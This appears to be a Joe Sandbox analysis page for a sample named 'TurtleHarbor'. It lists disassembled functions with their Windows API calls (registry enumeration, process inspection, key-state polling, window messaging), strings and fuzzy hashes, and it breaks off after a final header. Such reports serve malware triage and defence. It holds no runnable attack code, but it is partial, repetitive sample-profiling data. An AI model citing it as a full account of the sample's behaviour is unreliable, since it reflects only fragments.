Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d738d2be0a49d9c219ee4ebccd5f91b25dfe6e2bb501b2301cafa4707255ee69
Instruction ID: f3f040515f6279bba82c0e10f2598dad385656daa775a205b5f30723cafb0257
Opcode Fuzzy Hash: d738d2be0a49d9c219ee4ebccd5f91b25dfe6e2bb501b2301cafa4707255ee69
Instruction Fuzzy Hash: 4121A77450830A9BEB328F65DC05A9E77E8EF45720F218A19FCA4D72D0D774D850EBA0

Function 00377425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00377444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00377476
GetStdHandle.KERNEL32(000000F6), ref: 00377487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003774C1

Strings

nul, xrefs: 003774BC

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 597ee0d5eff3c09c380b19ff039bb7ced0894169fc0878df6398922069600147
Instruction ID: a80b4876ff86f7356fe65243c73f6db5b51021c2e0988e09f4c26f962928d2ce
Opcode Fuzzy Hash: 597ee0d5eff3c09c380b19ff039bb7ced0894169fc0878df6398922069600147
Instruction Fuzzy Hash: 1021C4316083059BDB319F6A8C49F997BA8AF45730F218B19F9A4D72D0DB749841CB50

Function 0037B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0037B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0037B2EB
__swprintf.LIBCMT ref: 0037B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,003A0980), ref: 0037B342

Strings

%lu, xrefs: 0037B2FE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c434260e5894871f0aee40d3510aa8421434d0fe0a0dcae8728a6604c4cbdb67
Instruction ID: efb868e18e753955a902a5de3ec3d3c373cea78d85ee33fb7640e6932302371f
Opcode Fuzzy Hash: c434260e5894871f0aee40d3510aa8421434d0fe0a0dcae8728a6604c4cbdb67
Instruction Fuzzy Hash: AC217435600208AFCB15DF65C885EEEB7B8EF89704F108069F509DB352DB31EA45CB61

Function 0036AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Part of subcall function 0036AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0036AA6F
Part of subcall function 0036AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0036AA82
Part of subcall function 0036AA52: GetCurrentThreadId.KERNEL32 ref: 0036AA89
Part of subcall function 0036AA52: AttachThreadInput.USER32(00000000), ref: 0036AA90

GetFocus.USER32 ref: 0036AC2A

Part of subcall function 0036AA9B: GetParent.USER32(?), ref: 0036AAA9

GetClassNameW.USER32(?,?,00000100), ref: 0036AC73
EnumChildWindows.USER32(?,0036ACEB), ref: 0036AC9B
__swprintf.LIBCMT ref: 0036ACB5

Strings

%s%d, xrefs: 0036ACAF

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 30d52d5011271007c35ca4dadb9b53e4c25004c1e1f90f2fbc2c17a1ec489b32
Instruction ID: 40178eab4efe067e68bc50cbea2f745671f6553ab49e98ae3e351a24ffecbafd
Opcode Fuzzy Hash: 30d52d5011271007c35ca4dadb9b53e4c25004c1e1f90f2fbc2c17a1ec489b32
Instruction Fuzzy Hash: DC11CD74200204ABCF13BFA0DD85FEA776CAB45300F0080B9FA08AA146CA715945CF71

Function 003722E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00372318

Strings

EXISTS, xrefs: 00372340
REMOVE, xrefs: 0037231E
KEYS, xrefs: 0037232F
APPEND, xrefs: 00372351

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 16be595af307c0585abec383290f374cdecc3225340434a9da0009828c06f1cb
Instruction ID: 3b256bfbff112a000c90d9ee9704a1810a9fcea0432d656e1d118973ed4cde20
Opcode Fuzzy Hash: 16be595af307c0585abec383290f374cdecc3225340434a9da0009828c06f1cb
Instruction Fuzzy Hash: EB115E38900118DFCF46EF94D9A1AEFB7B8FF16344F108469D815AB261EB3A5E06CB50

Function 0038F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0038F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0038F453
CloseHandle.KERNEL32(?), ref: 0038F4D4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: f8fc714eb81c9338e72cd0602c8fbc37e201bff4f88500caf87a5a6d1d7b9598
Instruction ID: 152b1c9c512dea25ffa553339871187f2735b67e3191e91a68c1d41e5cd5cff7
Opcode Fuzzy Hash: f8fc714eb81c9338e72cd0602c8fbc37e201bff4f88500caf87a5a6d1d7b9598
Instruction Fuzzy Hash: A481A3B16003009FD726EF29D882F6AB7E5AF4C710F14885DF999DB392D7B0AC818B51

Function 00390697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003907E3
RegCloseKey.ADVAPI32(?,?), ref: 0039080F
RegCloseKey.ADVAPI32(00000000), ref: 0039081C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: ff55411b8285053c46ac393cf596cf9df2076297bb7f8cc3d261716da2f5c2ec
Instruction ID: 26bd5241558d82a4cbf75161ab723df42136cc5580615de0eaf85902c383f615
Opcode Fuzzy Hash: ff55411b8285053c46ac393cf596cf9df2076297bb7f8cc3d261716da2f5c2ec
Instruction Fuzzy Hash: 44515E71208205AFDB0AEF64C981F6BB7E9FF89314F00891DF5958B291DB30E945CB92

Function 0037EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0037EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0037EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0037ECCA

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0037ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0037ECF7

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 0a96f8a35cfca8114b416952fb0d9cbad50820b248e4bbc4fe0f5ca79a933aca
Instruction ID: 0e50de9527a73dadc2383d555578993ea8793fe81a274089341f1570e6f50117
Opcode Fuzzy Hash: 0a96f8a35cfca8114b416952fb0d9cbad50820b248e4bbc4fe0f5ca79a933aca
Instruction Fuzzy Hash: AB513875A00209DFCB16EF64D985AAEBBF5EF0D310B148099E849AF362DB31ED51CB50

Function 0039A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd54597e5e1f4ec96bd9011f0b1344e4ac45cae55dbaa69bad39fc580e15e96
Instruction ID: a94ed029f5030d18f05ab0dbf58e56ff56a978bdec342f7c5f68620b468d2f66
Opcode Fuzzy Hash: fdd54597e5e1f4ec96bd9011f0b1344e4ac45cae55dbaa69bad39fc580e15e96
Instruction Fuzzy Hash: 38410635900514AFDF16DBE8CC86FA9BBB8EB0A310F160355F816A72D1D7309D41DAD1

Function 00312714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00312727
ScreenToClient.USER32(003D77B0,?), ref: 00312744
GetAsyncKeyState.USER32(00000001), ref: 00312769
GetAsyncKeyState.USER32(00000002), ref: 00312777

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 17dc50d97f5d9ced29e08eeca3f9f91e058d2f727364e3b7b801f074c6825e69
Instruction ID: 08dc51057ce585f09c5928f55bff54825c888513ec02bf088bc2444a432600cb
Opcode Fuzzy Hash: 17dc50d97f5d9ced29e08eeca3f9f91e058d2f727364e3b7b801f074c6825e69
Instruction Fuzzy Hash: 05418235505109FFDF1B9FA8C844AEABBB4FB0A324F108319F824962D1C734ADA0DB91

Function 003695D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003695E8
PostMessageW.USER32(?,00000201,00000001), ref: 00369692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0036969A
PostMessageW.USER32(?,00000202,00000000), ref: 003696A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003696B0

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: b076680e711869048d7aac844f13b987f50662a41edc0209c57672514d80a122
Instruction ID: 51c03a40fbb41534bd7f2c35e534161c8d843058b6ab75eb4a09f6e1fcf2e44f
Opcode Fuzzy Hash: b076680e711869048d7aac844f13b987f50662a41edc0209c57672514d80a122
Instruction Fuzzy Hash: 6731EE31900319EFDB15CFA8D94CB9E7BB9FB45325F11821AF824AB1D0C3B09920DB90

Function 0036BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0036BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0036BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0036BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0036BE18
_wcsstr.LIBCMT ref: 0036BE22

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: e3294cb8ccc255110c2c7a0fa9887e1e1bcb52d938a64398f3ea5fc6b8540278
Instruction ID: f452d0cc3022e9f4476bb75a238611f9dc9da0fcd01507a40b40c26e61c71e1c
Opcode Fuzzy Hash: e3294cb8ccc255110c2c7a0fa9887e1e1bcb52d938a64398f3ea5fc6b8540278
Instruction Fuzzy Hash: 88214C31204204BBEB275F35AC49E7BBB9CDF45710F018029F904CE095DB61CC908660

Function 0039B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

GetWindowLongW.USER32(?,000000F0), ref: 0039B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0039B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0039B841
GetSystemMetrics.USER32(00000004), ref: 0039B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0038155C,00000000), ref: 0039B888

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: b2bd6b06c1e31a975a725a1864de712d06def842329a8a2753b5bbba6af77f22
Instruction ID: 479f08013ad679cc2d427c51e149b8025cacf2622bc439f9e15c92381cbe77d2
Opcode Fuzzy Hash: b2bd6b06c1e31a975a725a1864de712d06def842329a8a2753b5bbba6af77f22
Instruction Fuzzy Hash: 2521B131918265AFCF169F38ED08A6A77ACFB09320F114729F925D21E0E3309810CB80

Function 00369EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00369ED8

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00369F0A
__itow.LIBCMT ref: 00369F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00369F4A
__itow.LIBCMT ref: 00369F5B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 4601715e5202501e6c3df80e8fc27adc1288a8979ec0674e6455055a013a57f6
Instruction ID: 16ecc714cb9dfc4fa558f4f1fe077d912a709105287cda0060efaa3500606eae
Opcode Fuzzy Hash: 4601715e5202501e6c3df80e8fc27adc1288a8979ec0674e6455055a013a57f6
Instruction Fuzzy Hash: 0821D731700208BFDB129A649DCAFEE7BACEB99721F058026F901DF291D670CD5597D1

Function 00386138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00386159
GetForegroundWindow.USER32 ref: 00386170
GetDC.USER32(00000000), ref: 003861AC
GetPixel.GDI32(00000000,?,00000003), ref: 003861B8
ReleaseDC.USER32(00000000,00000003), ref: 003861F3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2d662f5669174f95ac8e5ceeefdc0f1e904e4c3fb2cfa164a155df17b4598bae
Instruction ID: 49e3f5ea07e17142a3d088f8c70e9732ea8d050588263a101f186a56f4b0f384
Opcode Fuzzy Hash: 2d662f5669174f95ac8e5ceeefdc0f1e904e4c3fb2cfa164a155df17b4598bae
Instruction Fuzzy Hash: C421A475A006049FD719EF65DD89A9AB7F9EF8D310F048479E84A97262CA30AC40CB90

Function 003116CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00311729
SelectObject.GDI32(?,00000000), ref: 00311738
BeginPath.GDI32(?), ref: 0031174F
SelectObject.GDI32(?,00000000), ref: 00311778

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2a13b5532c9d58feca790cb2271aa76bacfac2f45279a1f0cf3627fc7fe4d931
Instruction ID: 9f34ce52b2ced5683adae2451d3cb1b79f6718521425deafad49a475335bad49
Opcode Fuzzy Hash: 2a13b5532c9d58feca790cb2271aa76bacfac2f45279a1f0cf3627fc7fe4d931
Instruction Fuzzy Hash: AF21AC30906218EBDB27DF24EC4ABED7BACFB08321F154217F915962E0E7719891DB90

Function 0036C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0036C84C
_memcmp.LIBCMT ref: 0036C86A
_memcmp.LIBCMT ref: 0036C87D
_memcmp.LIBCMT ref: 0036C895
_memcmp.LIBCMT ref: 0036C8AD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 816d0e7134389a9a725a215628b6fcdd7922b36c143e35791a5782a39ae71bcf
Instruction ID: 2fdf0f8bee4061cc41f911af80cb32228f6cda4753fde0a9d73e3852dad86de9
Opcode Fuzzy Hash: 816d0e7134389a9a725a215628b6fcdd7922b36c143e35791a5782a39ae71bcf
Instruction Fuzzy Hash: 6D01B162A501057BE22766529C82FFB736CEE61394F04C125FE469B74AE7A0DE1182F0

Function 0037504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00375075
__beginthreadex.LIBCMT ref: 00375093
MessageBoxW.USER32(?,?,?,?), ref: 003750A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003750BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003750C5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

